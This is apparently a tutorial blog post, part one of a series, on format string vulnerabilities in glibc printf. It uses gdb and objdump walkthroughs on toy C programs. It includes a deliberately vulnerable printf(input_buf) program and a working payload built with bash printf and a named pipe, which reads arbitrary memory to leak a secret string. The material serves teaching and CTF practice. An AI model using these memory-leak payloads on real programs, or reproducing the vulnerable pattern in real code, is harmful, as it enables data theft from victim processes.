The Rocky Road To Pwn - Part One
Format Print Basic and Elementary Format Print Attack
- Part One: Format Print Basic and Elementary Format Print Attack
- Part Two: Relocation(ASLR) and Data Manipulation With Format Print
- Part Three: A real CTF challenge
Welcome to the first part of the Pwn trilogy. Our journey begins with exploring the glibc implementation of the format print function printf from the C standard library. This will pave the way for direct and indirect memory reading, which is instrumental for information leaking. In the upcoming parts of this trilogy, we will delve deeper into the format print function, demonstrate how to manipulate data with format printing, and explain how it facilitates remote code execution (RCE). Additionally, we will discuss a system-level countermeasure to binary exploitation (Pwn) and how to bypass it. Finally, we will demonstrate the application of these skills in a real CTF challenge.
Format print basic
In C programming, the format print function is a crucial tool for output operations, enabling developers to present information to users in a structured and readable format. Its versatility allows for printing various data types, making it an indispensable asset for debugging, user interaction, and data presentation in software development. However, this power comes with costly vulnerabilities, particularly format string attacks. These vulnerabilities, if not understood and addressed, can be exploited to compromise the security of the software.
To understand how the format string attack works, we can start by looking at the position-parameterized placeholder arguments, which are in the form of %m$p, where m represents the position parameter of the placeholder and p represents the actual conversion specifier. To further explore the relationship between placeholders and the arguments of the format print function, let’s consider an example: printf("%d %c %x", 1, 121, 65);.
[skid.t@BlackArch workspace]$ cat poc.c
#include <stdio.h>
int main() {
printf("%d %c %x\n",1,121,65);
}
[skid.t@BlackArch workspace]$ gcc -O0 -g poc.c -o poc && ./poc
1 y 41
In the example above, the print function displays 1 y 41 using the format string %d %c %x. Here, %d corresponds to the first argument after the format string, 1. %c is for the second argument, which has the value 121, the ASCII code for the letter y. %x refers to the third argument with the value 65, which is 0x41 in hexadecimal.
[skid.t@BlackArch workspace]$ cat poc.c
#include <stdio.h>
int main() {
printf("%2$d %3$c %1$x\n",1,121,65);
}
[skid.t@BlackArch workspace]$ gcc -O0 -g poc.c -o poc && ./poc
121 A 1
[skid.t@BlackArch workspace]$
The listing above updates the format string to use positional parameters. Now, the %2$d in the format string corresponds to the second argument after the format string, with a value of 121. The %3$c corresponds to the third argument with a value of 65, the ASCII code for A. Likewise, %1$x corresponds to the first argument, 1, printed in hexadecimal.
Even though the program’s output aligns with the position parameters of each placeholder in the format string, we still need to determine how the format print function handles the position-parameterized placeholders. There are two hypotheses: either the arguments are rearranged at compile time, or they are read out of order at runtime. To find out, we can run the program with a debugger and set a breakpoint before the format print function is called. The debugger gives us a lower-level view of how things work.
Breakpoint 1, 0x000055555555515b in main () at poc.c:3
3 printf("%2$d %3$c %1$x\n",1,121,65);
(gdb) p /s (char *) $rdi
$1 = 0x555555556004 "%2$d %3$c %1$x\n"
(gdb) p $rsi
$2 = 1
(gdb) p $rdx
$3 = 121
(gdb) p $rcx
$4 = 65
We run and debug the program on a Linux-based x86_64 system. In the debugging session, we notice that the RDI register contains the pointer to the format string, the RSI register contains the first argument after the format string, the RDX register contains the second argument, and the RCX register contains the third argument. This adheres to the Linux x86_64 userspace function calling convention (the System V AMD64 ABI). Since the arguments arrive in their original order rather than rearranged, the format print function must resolve out-of-order placeholders at runtime.
We also dereference the format string pointer in the debugger because the value of RDI is just a pointer, and the address it refers to is the actual beginning of the format string. Consider the s conversion specifier from the format print function manual. If we arrange a placeholder with the s conversion specifier targeting the RDI register, the format print function will print the format string itself. For a program under a debugger, we could simply alter the value in the RSI register, making it identical to the RDI register. This way, a simple format string with %s as its first placeholder would print the format string itself. We will return to this idea in the indirect reading section of the format print attack.
Format print attack
The format print attack (a.k.a. format string attack) is a classical memory corruption attack that does not rely on a typical out-of-bounds buffer overflow. It stems from the variadic design of the format print function printf in the C standard library. The format print function takes its first argument as a format string containing placeholders and replaces them with the actual values during runtime. Thanks to the out-of-order placeholder resolution and built-in debug functionalities, user-controllable format strings provide an exploitable vulnerability for arbitrary memory dump or corruption.
The format print function always requires a format string as its first argument. If a user, legitimate or malicious, controls that format string, a format print attack becomes possible. We have categorized format print attack techniques into three categories: direct memory reading, indirect memory reading, and indirect memory writing. These categories are based on the behaviour of the format print function. Direct memory reading can read at most eight bytes (one octlet) per placeholder from existing stack frames, while indirect memory reading and writing theoretically enable access to arbitrary addresses. At the end of the last section, we described using the s conversion specifier to echo the format string. Indirect memory reading builds on a similar idea. But before we dive into indirect memory reading, let’s start with direct memory reading.
Direct memory reading
Direct memory reading is a technique that allows an external entity to exploit the format print function. If the external entity controls the format string provided to the format print function, it can provide a format string that contains too many or incorrectly positioned placeholders. In this case, the function attempts to convert the values in the corresponding memory location to a printable value, replacing the placeholder.
On most operating systems and architectures, the procedure calling convention passes at least some arguments on the stack. Therefore, an external entity could craft a format string that makes the format print function interpret a value on the stack as the argument associated with a placeholder, even though the caller never passed such an argument.
Since procedure call parameters on the stack can only appear on the caller’s stack frame, direct memory reading can only be applied to addresses above the current stack pointer. Additionally, direct memory reading usually extends beyond the current stack frame, covering most existing stack frames. The following example provides a demonstration of direct memory reading.
[skid.t@BlackArch workspace]$ cat poc.c
#include <stdio.h>
int main() {
const char flag[] = "my secret flag";
printf("%6$016llX %7$016llX %8$016llX %9$016llX %10$016llX %11$016llX\n");
}
[skid.t@BlackArch workspace]$ gcc -O0 -g poc.c -o poc
[skid.t@BlackArch workspace]$ ./poc
0000000000000000 7263657320796D40 0067616C66207465 3351B3EA0668A900 0000000000000001 00007FFFF7DB7CD0
In this example, the program creates a stack variable called flag and sets its value to my secret flag. It then uses the format print function with a long format string containing placeholders but no corresponding arguments. When the program is executed, it prints six hexadecimal numbers, each corresponding to a placeholder in the format string.
For example, let’s take 0000000000000000, which corresponds to the placeholder %6$016llX. Here, 6 indicates that this placeholder takes the value of the sixth argument after the format string. 016 combines the 0 flag with a field width of 16, so the resulting hexadecimal number is padded with leading zeros to 16 characters. Lastly, llX specifies that the argument is an unsigned long long integer presented in uppercase hexadecimal. On a Linux-based x86_64 system, long long integers are 64 bits long.
Recall the Linux x86_64 userspace function calling convention; the RDI register is for the first argument in a function call. In the case of the format print function, it’s always a pointer to the format string. The first six integer or pointer arguments are passed in registers, and any further arguments are passed on the stack. Given that the sixth argument after the format string is the seventh argument in a format print function call, %6$016llX decodes the first stack argument and displays it as a hexadecimal number.
According to the calling convention, the first stack argument is the 8-byte value pointed to by the stack pointer right before the call instruction executes. Inside the callee, it sits directly above the return address. Therefore, the long format string prints six consecutive 8-byte values from the caller function’s stack frame in ascending address order. We can verify this by examining the stack frame in the debugger.
Breakpoint 1, 0x000055555555518b in main () at poc.c:5
5 printf("%6$016llX %7$016llX %8$016llX %9$016llX %10$016llX %11$016llX\n");
(gdb) x/6gx $rsp
0x7fffffffe2d0: 0x0000000000000000 0x7263657320796d40
0x7fffffffe2e0: 0x0067616c66207465 0x3351b3ea0668a900
0x7fffffffe2f0: 0x0000000000000001 0x00007ffff7db7cd0
(gdb)
In the GNU Debugger (GDB), the memory dump command x accepts a format specifier similar to the one used by printf. The command above displays six consecutive octlets starting at the stack pointer (RSP) in hexadecimal format. The content shown by the debugger is the same as the values printed by the format print function.
We must consider endianness to further decode the hexadecimal number into byte sequences. On x86_64 machines, integers are stored in little-endian. Therefore, to reveal the 8-byte sequence represented by 0x7263657320796d40, we split the integer into bytes and reverse it: 0x40 0x6d 0x79 0x20 0x73 0x65 0x63 0x72. With the debugger, we don’t need to do this manually, as there’s another format specifier for the memory dump command that displays the memory chunk byte-by-byte.
(gdb) x/48bx $rsp
0x7fffffffe2d0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe2d8: 0x40 0x6d 0x79 0x20 0x73 0x65 0x63 0x72
0x7fffffffe2e0: 0x65 0x74 0x20 0x66 0x6c 0x61 0x67 0x00
0x7fffffffe2e8: 0x00 0xa9 0x68 0x06 0xea 0xb3 0x51 0x33
0x7fffffffe2f0: 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe2f8: 0xd0 0x7c 0xdb 0xf7 0xff 0x7f 0x00 0x00
Remember that the flag variable is located on the stack, specifically within the stack frame of the main function. Consequently, the program may have inadvertently exposed the flag through the format print function. Given this, it’s crucial to analyze the stack dump for the flag.
Stack dump interpretation
The example program dumped a memory chunk from its runtime stack. We must analyze the memory dump to check if it contains the flag string. To understand the structure of the stack frame, we can use static analysis by disassembling the main function to gain more insights.
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555149 <+0>: push %rbp
0x000055555555514a <+1>: mov %rsp,%rbp
0x000055555555514d <+4>: sub $0x20,%rsp
0x0000555555555151 <+8>: mov %fs:0x28,%rax
0x000055555555515a <+17>: mov %rax,-0x8(%rbp)
0x000055555555515e <+21>: xor %eax,%eax
0x0000555555555160 <+23>: movabs $0x657263657320796d,%rax
0x000055555555516a <+33>: mov %rax,-0x17(%rbp)
0x000055555555516e <+37>: movabs $0x67616c66207465,%rax
0x0000555555555178 <+47>: mov %rax,-0x10(%rbp)
0x000055555555517c <+51>: lea 0xe85(%rip),%rax # 0x555555556008
0x0000555555555183 <+58>: mov %rax,%rdi
0x0000555555555186 <+61>: mov $0x0,%eax
=> 0x000055555555518b <+66>: call 0x555555555040 <printf@plt>
0x0000555555555190 <+71>: mov $0x0,%eax
0x0000555555555195 <+76>: mov -0x8(%rbp),%rdx
0x0000555555555199 <+80>: sub %fs:0x28,%rdx
0x00005555555551a2 <+89>: je 0x5555555551a9 <main+96>
0x00005555555551a4 <+91>: call 0x555555555030 <__stack_chk_fail@plt>
0x00005555555551a9 <+96>: leave
0x00005555555551aa <+97>: ret
End of assembler dump.
The disassembled main function reveals that stack variables use base pointer (RBP) relative addressing. This is common on x86_64 machines because the base pointer (RBP) is more stable than the stack pointer (RSP) during a procedure call. We will delve into this in more detail later. The disassembled instructions indicate that the flag text is stored on the stack at RBP-23 (0x17), occupying a 15-byte space. Following that is the stack canary at RBP-8, which occupies 8 bytes. Then, the saved base pointer value from the previous stack frame, an octlet, follows the stack canary. Finally, the 8-byte return address is at the bottom of the current stack frame.
In the debugging session, we found that the stack pointer (RSP) is located at 0x7fffffffe2d0. With this information, we can reconstruct the structure of the stack frame.
Stack Pointer(RSP): ┌───────────────────────┐
0x7fffffffe2d0 │ unused │
│ ┌────────────────────┤
0x7fffffffe2d8 │ │ flag │
├──┴────────────────────┤
0x7fffffffe2e0 │ flag (cont.) │
├───────────────────────┤
0x7fffffffe2e8 │ stack canary │
Base Pointer(RBP): ├───────────────────────┤
0x7fffffffe2f0 │ saved RBP │
├───────────────────────┤
0x7fffffffe2f8 │ return address │
└───────────────────────┘
The stack pointer (RSP) is 32 bytes (0x20 in hexadecimal) from the base pointer (RBP). The flag variable is located at 0x7fffffffe2d9. Following that, the stack canary is at 0x7fffffffe2e8, the value of the saved RBP pointed to by the base pointer is at 0x7fffffffe2f0, and the return address is at 0x7fffffffe2f8.
We have the addresses and offsets of each variable. With the stack dump, we can easily reconstruct the flag string my secret flag from the leaked byte sequence: 0x6d 0x79 0x20 0x73 0x65 0x63 0x72 0x65 0x74 0x20 0x66 0x6c 0x61 0x67 0x00. These values come from the second and third hexadecimal numbers printed by the program.
In real-world scenarios, the flag string may contain sensitive data, such as user credentials, that should not be displayed. Furthermore, a malicious actor may supply the format string instead of it being hardcoded. Such a format string typically contains too many or incorrectly positioned placeholders, which can result in data leakage. Because the format print function reads the corresponding data and prints it directly, without dereferencing any pointers, the technique is called direct memory reading.
Exploring direct memory reading is a valuable first step into binary exploitation. In this section, we extracted a secret flag from the victim process’s stack frame. As mentioned, the direct memory reading technique only works for addresses higher than the current stack pointer (RSP). To go beyond this, we must introduce the indirect memory reading technique. Additionally, it’s important to practice reading disassembled functions and reconstructing data structures from memory dumps.
Indirect memory reading
Indirect memory reading enhances memory dumping by targeting arbitrary addresses. Unlike direct memory reading, which reads the value on the stack and prints it directly, indirect memory reading fetches the value on the stack, dereferences it as if it is a pointer, and prints out data at the designated address.
Earlier, we described how modifying the RSI register in a debugger lets a %s placeholder print the format string. The concept of indirect memory reading is similar but relies on values on the stack instead of modified register values. In that scenario, the RSI register is linked to a placeholder with the s conversion specifier. The s conversion specifier treats the associated argument as a string pointer, dereferences it, and prints both printable and non-printable bytes until a null byte is encountered. The following example helps us understand the s conversion specifier at a lower level.
[skid.t@BlackArch workspace]$ cat poc.c
#include <stdio.h>
const char motto[] = "binary exploitation is sick!";
int main() {
printf("%s\n",motto);
}
[skid.t@BlackArch workspace]$ gcc -O0 -g -fno-builtin poc.c -o poc
[skid.t@BlackArch workspace]$ ./poc
binary exploitation is sick!
In this example, the string “motto” is stored as a global static constant outside the runtime call stack. When the printf function prints the content of the “motto” string, it must dereference the provided pointer, which holds the string’s address. Additionally, the source code is compiled with GCC built-in functions disabled. This means that built-in function optimizations will not replace printf with puts even if dynamic formatting at runtime is unnecessary. As with previous cases, it helps to disassemble the main function, this time with objdump, to view its underlying details at a lower level.
[skid.t@BlackArch workspace]$ objdump --disassemble=main ./poc
./poc: file format elf64-x86-64
Disassembly of section .init:
Disassembly of section .plt:
Disassembly of section .text:
0000000000001139 <main>:
1139: 55 push %rbp
113a: 48 89 e5 mov %rsp,%rbp
113d: 48 8d 05 cc 0e 00 00 lea 0xecc(%rip),%rax # 2010 <motto>
1144: 48 89 c6 mov %rax,%rsi
1147: 48 8d 05 df 0e 00 00 lea 0xedf(%rip),%rax # 202d <motto+0x1d>
114e: 48 89 c7 mov %rax,%rdi
1151: b8 00 00 00 00 mov $0x0,%eax
1156: e8 d5 fe ff ff call 1030 <printf@plt>
115b: b8 00 00 00 00 mov $0x0,%eax
1160: 5d pop %rbp
1161: c3 ret
Disassembly of section .fini:
[skid.t@BlackArch workspace]$ xxd -seek 8208 -l 48 poc
00002010: 6269 6e61 7279 2065 7870 6c6f 6974 6174 binary exploitat
00002020: 696f 6e20 6973 2073 6963 6b21 0025 730a ion is sick!.%s.
00002030: 0000 0000 011b 033b 2000 0000 0300 0000 .......; .......
The disassembler output for the main function is short. These instructions load the addresses of the “motto” string and the format string into the corresponding argument registers before calling the printf procedure. The addresses of both strings are not hardcoded as absolute values; instead, they are offsets relative to the instruction pointer register (RIP). This happens because the compiler emits position-independent code (PIC), which allows program segments to be loaded at arbitrary addresses instead of a predefined one, as required by address space layout randomization (ASLR). ASLR is a countermeasure against adversaries who aim to gain control over the program flow.
Although the disassembler has already annotated the resolved addresses of the strings, it’s still interesting to understand where those numbers come from. If you add 0xecc directly to the address of the lea instruction, 0x113d, you get 0x2009, which is 7 bytes short of the disassembler-suggested address. This happens because the address arithmetic occurs after the fetch stage of the CPU instruction cycle, when RIP already points to the next instruction. Therefore, the correct RIP value for the arithmetic is the address of the next instruction, 0x1144, which leads to the correct address, 0x2010, or 8208 in decimal. Inspecting the binary at that offset with a hex dump, or attaching a debugger to inspect the actual layout of the loaded executable, can help verify the address.
Breakpoint 1, 0x0000555555555156 in main () at poc.c:6
6 printf("%s\n",motto);
(gdb) disassemble
Dump of assembler code for function main:
0x0000555555555139 <+0>: push %rbp
0x000055555555513a <+1>: mov %rsp,%rbp
0x000055555555513d <+4>: lea 0xecc(%rip),%rax # 0x555555556010 <motto>
0x0000555555555144 <+11>: mov %rax,%rsi
0x0000555555555147 <+14>: lea 0xedf(%rip),%rax # 0x55555555602d
0x000055555555514e <+21>: mov %rax,%rdi
0x0000555555555151 <+24>: mov $0x0,%eax
=> 0x0000555555555156 <+29>: call 0x555555555030 <printf@plt>
0x000055555555515b <+34>: mov $0x0,%eax
0x0000555555555160 <+39>: pop %rbp
0x0000555555555161 <+40>: ret
End of assembler dump.
(gdb) p $rip
$1 = (void (*)()) 0x555555555156 <main+29>
(gdb) p/x $rdi
$2 = 0x55555555602d
(gdb) p/x $rsi
$3 = 0x555555556010
(gdb) p/x main + 11 + 0xecc
$4 = 0x555555556010
(gdb) p/x main + 21 + 0xedf
$5 = 0x55555555602d
(gdb) p/x $rdi - $rsi
$6 = 0x1d
(gdb) x/48bx motto
0x555555556010 <motto>: 0x62 0x69 0x6e 0x61 0x72 0x79 0x20 0x65
0x555555556018 <motto+8>: 0x78 0x70 0x6c 0x6f 0x69 0x74 0x61 0x74
0x555555556020 <motto+16>: 0x69 0x6f 0x6e 0x20 0x69 0x73 0x20 0x73
0x555555556028 <motto+24>: 0x69 0x63 0x6b 0x21 0x00 0x25 0x73 0x0a
0x555555556030: 0x00 0x00 0x00 0x00 0x01 0x1b 0x03 0x3b
0x555555556038: 0x20 0x00 0x00 0x00 0x03 0x00 0x00 0x00
(gdb) p/s motto
$7 = "binary exploitation is sick!"
(gdb) p/s motto+0x1d
$8 = 0x55555555602d "%s\n"
The program runs on a Linux-based x86_64 system with ASLR enabled. ASLR randomizes where the program’s sections are loaded, including the main function and its lea instructions. After relocation, the main function is loaded at 0x555555555139, and the two lea instructions end up at 0x55555555513d and 0x555555555147, respectively. (GDB disables address randomization for the process it debugs by default, which is why these addresses look the same across debugging sessions.) Regardless of the load address, the relative offsets between the instructions, the motto, and the format string remain consistent. We confirmed this consistency using the debugger’s built-in arithmetic.
The s conversion specifier in printf treats the specified argument as a pointer to a character string (char *). It dereferences the pointer and then replaces the corresponding placeholder with the binary content of the character string. The binary content of the character string consists of printable and non-printable bytes until a null byte is encountered. Although limiting the number of bytes to print in the resulting string is possible, there’s no straightforward way to encode the byte stream into decimal or hexadecimal format. The concept of indirect memory reading combines the s conversion specifier and position parameters to read data from an arbitrary address.
Understanding how the %s placeholder works at a lower level makes it easier to comprehend position-parameterized placeholders. Position-parameterized placeholders in externally controlled format strings are crucial for indirect memory reading. To better understand this concept, consider the following C example: it sets up a scenario where the program prints the address of a global static constant named secret_motto, reads an externally controlled format string from the standard input, and processes it. This example is a valuable practice for the techniques we have just learned.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <alloca.h>
#define BUFSIZE 32
const char secret_motto[] = "you are sick!";
int main() {
printf("Hackme at: %p\n",&secret_motto);
char *input_buf = alloca(BUFSIZE);
memset(input_buf,0,BUFSIZE);
if(!fgets(input_buf,BUFSIZE,stdin)) {
puts("I feel sick, Bye.");
exit(EXIT_FAILURE);
}
printf(input_buf);
return EXIT_SUCCESS;
}
Unlike previous examples, the program prints the address of the motto instead of loading it onto the stack frame. Also, because the first printf is far from the second printf and there are multiple procedure calls in between, the arguments passed in registers are not guaranteed to survive. However, the user input buffer resides on the call stack, allowing us to inject the motto’s address into the stack at runtime. This makes it possible to perform an indirect memory reading with a position-parameterized placeholder. We can begin by disassembling the main function and reconstructing the stack frame.
[skid.t@BlackArch workspace]$ gcc -O0 -g poc.c -o poc
[skid.t@BlackArch workspace]$ objdump --disassemble=main ./poc
./poc: file format elf64-x86-64
Disassembly of section .init:
Disassembly of section .plt:
Disassembly of section .text:
0000000000001189 <main>:
1189: 55 push %rbp
118a: 48 89 e5 mov %rsp,%rbp
118d: 48 83 ec 10 sub $0x10,%rsp
1191: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
1198: 00 00
119a: 48 89 45 f8 mov %rax,-0x8(%rbp)
119e: 31 c0 xor %eax,%eax
11a0: 48 8d 05 61 0e 00 00 lea 0xe61(%rip),%rax # 2008 <secret_motto>
11a7: 48 89 c6 mov %rax,%rsi
11aa: 48 8d 05 65 0e 00 00 lea 0xe65(%rip),%rax # 2016 <secret_motto+0xe>
11b1: 48 89 c7 mov %rax,%rdi
11b4: b8 00 00 00 00 mov $0x0,%eax
11b9: e8 92 fe ff ff call 1050 <printf@plt>
11be: b8 10 00 00 00 mov $0x10,%eax
11c3: 48 83 e8 01 sub $0x1,%rax
11c7: 48 83 c0 28 add $0x28,%rax
11cb: b9 10 00 00 00 mov $0x10,%ecx
11d0: ba 00 00 00 00 mov $0x0,%edx
11d5: 48 f7 f1 div %rcx
11d8: 48 6b c0 10 imul $0x10,%rax,%rax
11dc: 48 29 c4 sub %rax,%rsp
11df: 48 89 e0 mov %rsp,%rax
11e2: 48 83 c0 0f add $0xf,%rax
11e6: 48 c1 e8 04 shr $0x4,%rax
11ea: 48 c1 e0 04 shl $0x4,%rax
11ee: 48 89 45 f0 mov %rax,-0x10(%rbp)
11f2: 48 8b 45 f0 mov -0x10(%rbp),%rax
11f6: ba 20 00 00 00 mov $0x20,%edx
11fb: be 00 00 00 00 mov $0x0,%esi
1200: 48 89 c7 mov %rax,%rdi
1203: e8 58 fe ff ff call 1060 <memset@plt>
1208: 48 8b 15 31 2e 00 00 mov 0x2e31(%rip),%rdx # 4040 <stdin@GLIBC_2.2.5>
120f: 48 8b 45 f0 mov -0x10(%rbp),%rax
1213: be 20 00 00 00 mov $0x20,%esi
1218: 48 89 c7 mov %rax,%rdi
121b: e8 50 fe ff ff call 1070 <fgets@plt>
1220: 48 85 c0 test %rax,%rax
1223: 75 19 jne 123e <main+0xb5>
1225: 48 8d 05 f9 0d 00 00 lea 0xdf9(%rip),%rax # 2025 <secret_motto+0x1d>
122c: 48 89 c7 mov %rax,%rdi
122f: e8 fc fd ff ff call 1030 <puts@plt>
1234: bf 01 00 00 00 mov $0x1,%edi
1239: e8 42 fe ff ff call 1080 <exit@plt>
123e: 48 8b 45 f0 mov -0x10(%rbp),%rax
1242: 48 89 c7 mov %rax,%rdi
1245: b8 00 00 00 00 mov $0x0,%eax
124a: e8 01 fe ff ff call 1050 <printf@plt>
124f: b8 00 00 00 00 mov $0x0,%eax
1254: 48 8b 55 f8 mov -0x8(%rbp),%rdx
1258: 64 48 2b 14 25 28 00 sub %fs:0x28,%rdx
125f: 00 00
1261: 74 05 je 1268 <main+0xdf>
1263: e8 d8 fd ff ff call 1040 <__stack_chk_fail@plt>
1268: c9 leave
1269: c3 ret
Disassembly of section .fini:
The main function in assembly is more complex than in previous examples, but we can skip most details for analysis purposes. The user input buffer is located on the stack and is directly pointed to by the stack pointer RSP. One notable aspect of the disassembly is the significant growth of the stack frame, indicated by the considerable decrement of the stack pointer RSP in the middle of the function. This happens because alloca allocates the buffer for user input within the current stack frame, whereas malloc allocates memory from the heap. The delayed allocation of the input buffer helps to align the start of the buffer with the stack pointer RSP.
The user input buffer begins at the stack pointer RSP, and the program reveals the address of the motto. This makes it easier to create a format string payload that prints the secret motto. Since the program uses fgets to read user input, we can inject raw bytes into the buffer without worrying about null and escape characters (only a newline byte, 0x0a, would end the read early). To exploit this, a simple approach for the format string is to encode the motto’s address into a little-endian octlet and append the suffix %6$s to it. Theoretically, the format print function should display the little-endian octlet in raw binary and then print the motto. The suffix %6$s instructs the format print function to dereference the first octlet on the stack and print the string at that address. However, we don’t live in a perfect world.
The fgets function does not treat null bytes specially and places all input content into the stack buffer. However, the format print function only processes part of the format string. Precisely, it only echoes the first six bytes of the little-endian octlet, because the two most significant bytes of the address are zero. This is consistent with the manual of the format print function, which treats the format string as a null-terminated string. Therefore, the format print function only processes the portion of the format string before the first null byte. Based on this, we must adjust the format string payload so that the placeholder goes before the little-endian octlet.
To prevent truncation, we switch the positions of the placeholder and the little-endian octlet. Remember that the positional parameter in a placeholder specifies the procedure call argument for the format print function. The x86_64 calling convention requires all stack arguments to be octlets. Therefore, the little-endian octlet must start at an offset from the stack pointer (RSP) that is a multiple of eight. We must pad the placeholder with arbitrary non-null characters to meet the alignment requirement. We choose the space character for padding. Additionally, we need to update the position parameter from 6 to 7 in the format placeholder, as the little-endian octlet is now one octlet away from the stack pointer (RSP). In the end, we have %7$s, four spaces of padding, and then the raw bytes of the address of the motto string.
One crucial detail remains: the format string payload depends on the randomly generated address of the motto, which is only determined and leaked at runtime. As a result, we cannot prepare the payload in advance. Since the payload contains non-printable bytes, we cannot simply type it in as we would for a regular command line program. To address this issue, we use a bash trick. We feed the program’s standard input from a named pipe called payload instead of the console, then write the assembled format string payload into the named pipe. Additionally, we use the bash built-in command printf to construct the payload, which requires escaping the leading percent sign as %% so that bash does not interpret it as a placeholder of its own.
[skid.t@BlackArch workspace]$ mkfifo payload
[skid.t@BlackArch workspace]$ tail -f payload | ./poc & sleep 1
[1] 116974
Hackme at: 0x5bd2489bb008
[skid.t@BlackArch workspace]$ printf '%%7$s    \x08\xb0\x9b\x48\xd2\x5b\x00\x00\n' | xxd
00000000: 2537 2473 2020 2020 08b0 9b48 d25b 0000  %7$s    ...H.[..
00000010: 0a                                       .
[skid.t@BlackArch workspace]$ printf '%%7$s    \x08\xb0\x9b\x48\xd2\x5b\x00\x00\n' > payload ; sleep 1
you are sick! H�[1]+ Done tail -f payload | ./poc
In this example, we exploited a vulnerable program to reveal a global static string that should have been kept secret. The exploitation combines the indirect memory reading technique with some bash tricks. The indirect memory reading technique does not require attaching a debugger to the vulnerable program or altering its register values. Instead, it places the target address on the stack and associates it with the s conversion specifier using a positional parameter. Indirect memory reading thus makes it possible to read from specific memory addresses of the victim process rather than only from its stack.
This concludes part one of the Pwn trilogy. Here, we covered the basics of the format print function, from an overview down to its lower-level behaviour. We also discussed the format string attack, focusing on two approaches for leaking information: direct and indirect memory reading. Part two will explore how to alter existing data and take over the victim program’s control flow, leading to remote code execution (RCE). Additionally, we will examine countermeasures against modern binary exploitation and how to bypass them. Finally, part three will apply all the techniques in an actual Capture The Flag (CTF) challenge. We hope you enjoy them.